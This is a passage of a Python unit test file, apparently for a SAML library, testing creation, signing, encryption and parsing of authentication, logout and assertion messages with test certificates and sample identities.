".ch/idp/shibboleth"
assert req.id == "id1"
assert req.version == "2.0"
assert req.issue_instant
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
nameid = req.subject.name_id
assert nameid.format == saml.NAMEID_FORMAT_TRANSIENT
assert nameid.text == "_e7b68a04488f715cda642fbdd90099f5"
def test_create_auth_request_0(self):
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_TRANSIENT
node_requested_attributes = None
for e in ar.extensions.extension_elements:
if e.tag == RequestedAttributes.c_tag:
node_requested_attributes = e
break
assert node_requested_attributes is not None
for c in node_requested_attributes.children:
assert c.tag == RequestedAttribute.c_tag
assert c.attributes['isRequired'] in ['true', 'false']
assert c.attributes['Name']
assert c.attributes['FriendlyName']
assert c.attributes['NameFormat']
def test_create_auth_request_unset_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1")
assert bool(req.force_authn) == False
def test_create_auth_request_set_force_authn(self):
req_id, req = self.client.create_authn_request(
"http://www.example.com/sso", sign=False, message_id="id1",
force_authn="true")
assert bool(req.force_authn) == True
def test_create_auth_request_nameid_policy_allow_create(self):
conf = config.SPConfig()
conf.load_file("sp_conf_nameidpolicy")
client = Saml2Client(conf)
ar_str = "%s" % client.create_authn_request(
"http://www.example.com/sso", message_id="id1")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.assertion_consumer_service_url == ("http://lingon.catalogix"
".se:8087/")
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "true"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
def test_create_auth_request_vo(self):
assert list(self.client.config.vorg.keys()) == [
"urn:mace:example.com:it:tek"]
ar_str = "%s" % self.client.create_authn_request(
"http://www.example.com/sso",
"urn:mace:example.com:it:tek", # vo
nameid_format=NAMEID_FORMAT_PERSISTENT,
message_id="666")[1]
ar = samlp.authn_request_from_string(ar_str)
assert ar.id == "666"
assert ar.assertion_consumer_service_url == "http://lingon.catalogix" \
".se:8087/"
assert ar.destination == "http://www.example.com/sso"
assert ar.protocol_binding == BINDING_HTTP_POST
assert ar.version == "2.0"
assert ar.provider_name == "urn:mace:example.com:saml:roland:sp"
assert ar.issuer.text == "urn:mace:example.com:saml:roland:sp"
nid_policy = ar.name_id_policy
assert nid_policy.allow_create == "false"
assert nid_policy.format == saml.NAMEID_FORMAT_PERSISTENT
assert nid_policy.sp_name_qualifier == "urn:mace:example.com:it:tek"
def test_sign_auth_request_0(self):
req_id, areq = self.client.create_authn_request(
"http://www.example.com/sso", sign=True, message_id="id1")
ar_str = "%s" % areq
ar = samlp.authn_request_from_string(ar_str)
assert ar
assert ar.signature
assert ar.signature.signature_value
signed_info = ar.signature.signed_info
assert len(signed_info.reference) == 1
assert signed_info.reference[0].uri == "#id1"
assert signed_info.reference[0].digest_value
try:
assert self.client.sec.correctly_signed_authn_request(
ar_str, self.client.config.xmlsec_binary,
self.client.config.metadata)
except Exception: # missing certificate
self.client.sec.verify_signature(ar_str, node_name=class_name(ar))
def test_create_logout_request(self):
req_id, req = self.client.create_logout_request(
"http://localhost:8088/slo", "urn:mace:example.com:saml:roland:idp",
name_id=nid, reason="Tired", expire=in_a_while(minutes=15),
session_indexes=["_foo"])
assert req.destination == "http://localhost:8088/slo"
assert req.reason == "Tired"
assert req.version == "2.0"
assert req.name_id == nid
assert req.issuer.text == "urn:mace:example.com:saml:roland:sp"
assert req.session_index == [SessionIndex("_foo")]
def test_response_1(self):
IDP = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id_policy=nameid_policy,
sign_response=True,
userid="<EMAIL>",
authn=AUTHN)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
assert authn_response is not None
assert authn_response.issuer() == IDP
assert authn_response.response.assertion[0].issuer.text == IDP
session_info = authn_response.session_info()
assert session_info["ava"] == {'mail': ['<EMAIL>'],
'givenName': ['Derek'],
'sn': ['Jeter'],
'title': ["The man"]}
assert session_info["issuer"] == IDP
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
assert "session_index" in session_info
# One person in the cache
assert len(self.client.users.subjects()) == 1
subject_id = self.client.users.subjects()[0]
# The information I have about the subject comes from one source
assert self.client.users.issuers_of_info(subject_id) == [IDP]
# --- authenticate another person
ava = {"givenName": ["Alfonson"], "sn": ["Soriano"],
"mail": ["<EMAIL>"], "title": ["outfielder"]}
resp_str = "%s" % self.server.create_authn_response(
identity=ava,
in_response_to="id2",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
sign_response=True,
name_id_policy=nameid_policy,
userid="<EMAIL>",
authn=AUTHN)
resp_str = encode_fn(resp_str.encode())
self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id2": "http://foo.example.com/service"})
# Two persons in the cache
assert len(self.client.users.subjects()) == 2
issuers = [self.client.users.issuers_of_info(s) for s in
self.client.users.subjects()]
# The information I have about the subjects comes from the same source
assert issuers == [[IDP], [IDP]]
def test_response_2(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_3(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_4(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_5(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_6(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_assertion_str, cert_key_assertion_str = generate_cert()
cert_assertion = \
{
"cert": cert_assertion_str,
"key": cert_key_assertion_str
}
cert_advice_str, cert_key_advice_str = generate_cert()
cert_advice = \
{
"cert": cert_advice_str,
"key": cert_key_advice_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_assertion=cert_assertion_str,
encrypt_cert_advice=cert_advice_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"},
{"id1": [cert_assertion, cert_advice]})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_7(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=True,
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def test_response_8(self):
conf = config.SPConfig()
conf.load_file("server_conf")
_client = Saml2Client(conf)
idp, ava, ava_verify, nameid_policy = self.setup_verify_authn_response()
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id1")
cert_str, cert_key_str = generate_cert()
cert = \
{
"cert": cert_str,
"key": cert_key_str
}
resp = self.server.create_authn_response(
identity=ava,
in_response_to="id1",
destination="http://lingon.catalogix.se:8087/",
sp_entity_id="urn:mace:example.com:saml:roland:sp",
name_id=self.name_id,
userid="<EMAIL>",
authn=AUTHN,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypt_cert_assertion=cert_str
)
resp_str = "%s" % resp
resp_str = encode_fn(resp_str.encode())
authn_response = _client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"id1": "http://foo.example.com/service"}, {"id1": cert})
self.verify_authn_response(idp, authn_response, _client, ava_verify)
def setup_verify_authn_response(self):
idp = "urn:mace:example.com:saml:roland:idp"
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["<EMAIL>"], "title": ["The man"]}
ava_verify = {'mail': ['<EMAIL>'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ["The man"]}
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
return idp, ava, ava_verify, nameid_policy
def verify_authn_response(self, idp, authn_response, _client, ava_verify):
assert authn_response is not None
assert authn_response.issuer() == idp
assert authn_response.assertion.issuer.text == idp
session_info = authn_response.session_info()
assert session_info["ava"] == ava_verify
assert session_info["issuer"] == idp
assert session_info["came_from"] == "http://foo.example.com/service"
response = samlp.response_from_string(authn_response.xmlstr)
assert response.destination == "http://lingon.catalogix.se:8087/"
# One person in the cache
assert len(_client.users.subjects()) == 1
subject_id = _client.users.subjects()[0]
# The information I have about the subject comes from one source
assert _client.users.issuers_of_info(subject_id) == [idp]
def test_init_values(self):
entityid = self.client.config.entityid
assert entityid == "urn:mace:example.com:saml:roland:sp"
location = self.client._sso_location()
assert location == 'http://localhost:8088/sso'
my_name = self.client._my_name()
assert my_name == "urn:mace:example.com:saml:roland:sp"
def test_sign_then_encrypt_assertion(self):
# Begin with the IdPs side
_sec = self.server.sec
assertion = s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=factory(
saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=full_path("test.key"),
node_id=assertion.id)
# Create an Assertion instance from the signed assertion
_ass = saml.assertion_from_string(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
assertion=_ass
)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part())
seresp = samlp.response_from_string(enctext)
# Now over to the client side
_csec = self.client.sec
if seresp.encrypted_assertion:
decr_text = _csec.decrypt(enctext)
seresp = samlp.response_from_string(decr_text)
resp_ass = []
sign_cert_file = full_path("test.pem")
for enc_ass in seresp.encrypted_assertion:
assers = extension_elements_to_elements(
enc_ass.extension_elements, [saml, samlp])
for ass in assers:
if ass.signature:
if not _csec.verify_signature("%s" % ass,
sign_cert_file,
node_name=class_name(
ass)):
continue
resp_ass.append(ass)
seresp.assertion = resp_ass
seresp.encrypted_assertion = None
assert seresp.assertion
def test_sign_then_encrypt_assertion2(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
name_id=factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion']
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=self.client.sec.key_file,
node_id=assertion.id)
sigass = rm_xmltag(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
encrypted_assertion=EncryptedAssertion()
)
xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
enctext = _sec.crypto.encrypt_assertion(xmldoc,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
# Explicitely allow unsigned responses for this and the following 2 tests
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.ava == {'givenName': ['Derek'], 'sn': ['Jeter']}
def test_sign_then_encrypt_assertion_advice_1(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
subject_confirmation_specs = {
'recipient': "http://lingon.catalogix.se:8087/",
'in_response_to': "_012345",
'subject_confirmation_method': saml.SCM_BEARER
}
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
name_id=name_id,
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion'])
a_asser = Assertion({"uid": "test01", "email": "<EMAIL>"})
a_assertion = a_asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion.signature = sigver.pre_signature_part(
a_assertion.id, _sec.my_cert, 1)
assertion.advice = Advice()
assertion.advice.encrypted_assertion = []
assertion.advice.encrypted_assertion.append(EncryptedAssertion())
assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion.append(assertion)
response = _sec.sign_statement("%s" % response, class_name(a_assertion),
key_file=self.client.sec.key_file,
node_id=a_assertion.id)
# xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
# xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'sn': ['Jeter'], 'givenName': ['Derek'], 'uid': ['test01'],
'email': ['<EMAIL>']}
def test_sign_then_encrypt_assertion_advice_2(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser_1 = Assertion({"givenName": "Derek"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
assertion_1 = asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
asser_2 = Assertion({"sn": "Jeter"})
assertion_2 = asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_1 = Assertion({"uid": "test01"})
a_assertion_1 = a_asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_2 = Assertion({"email": "<EMAIL>"})
a_assertion_2 = a_asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_3 = Assertion({"street": "street"})
a_assertion_3 = a_asser_3.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_4 = Assertion({"title": "title"})
a_assertion_4 = a_asser_4.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion_1.signature = sigver.pre_signature_part(
a_assertion_1.id, _sec.my_cert, 1)
a_assertion_2.signature = sigver.pre_signature_part(
a_assertion_2.id, _sec.my_cert, 1)
a_assertion_3.signature = sigver.pre_signature_part(
a_assertion_3.id, _sec.my_cert, 1)
a_assertion_4.signature = sigver.pre_signature_part(
a_assertion_4.id, _sec.my_cert, 1)
assertion_1.signature = sigver.pre_signature_part(assertion_1.id,
_sec.my_cert, 1)
assertion_2.signature = sigver.pre_signature_part(assertion_2.id,
_sec.my_cert, 1)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion = assertion_1
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_1)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_1._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_1),
key_file=self.server.sec.key_file,
node_id=a_assertion_1.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_2)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_2._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_2),
key_file=self.server.sec.key_file,
node_id=a_assertion_2.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
assertion_tag = response.assertion._to_element_tree().tag
response = pre_encrypt_assertion(response)
response = \
response.get_xml_string_with_self_contained_assertion_within_encrypted_assertion(
assertion_tag)
response = _sec.sign_statement("%s" % response, class_name(assertion_1),
key_file=self.server.sec.key_file,
node_id=assertion_1.id)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
response = samlp.response_from_string(enctext)
response.assertion = assertion_2
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_3)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_3._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_3),
key_file=self.server.sec.key_file,
node_id=a_assertion_3.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_4)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_4._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_4),
key_file=self.server.sec.key_file,
node_id=a_assertion_4.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response = _sec.sign_statement("%s" % response,
class_name(response.assertion[0]),
key_file=self.server.sec.key_file,
node_id=response.assertion[0].id)
response = samlp.response_from_string(response)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(str(response).encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'street': ['street'], 'uid': ['test01'], 'title': ['title'],
'givenName': ['Derek'], 'email':
['<EMAIL>'], 'sn': ['Jeter']}
def test_signed_redirect(self):
# Revert configuration change to disallow unsinged responses
self.client.want_response_signed = True
msg_str = "%s" % self.client.create_authn_request(
"http://localhost:8088/sso", message_id="id1")[1]
info = self.client.apply_binding(
BINDING_HTTP_REDIRECT, msg_str, destination="",
relay_state="relay2", sigalg=SIG_RSA_SHA256)
loc = info["headers"][0][1]
qs = parse_qs(loc[1:])
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
self.client.sec.sec_backend)
res = self.server.parse_authn_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_signed_redirect(self):
conf = config.SPConfig()
conf.load_file("sp_slo_redirect_conf")
client = Saml2Client(conf)
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
client.users.add_information_about_person(session_info)
entity_ids = client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = client.do_logout(nid, entity_ids, "Tired", in_a_while(minutes=5),
sign=True,
expected_binding=BINDING_HTTP_REDIRECT)
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_REDIRECT
loc = info["headers"][0][1]
_, _, _, _, qs, _ = urlparse(loc)
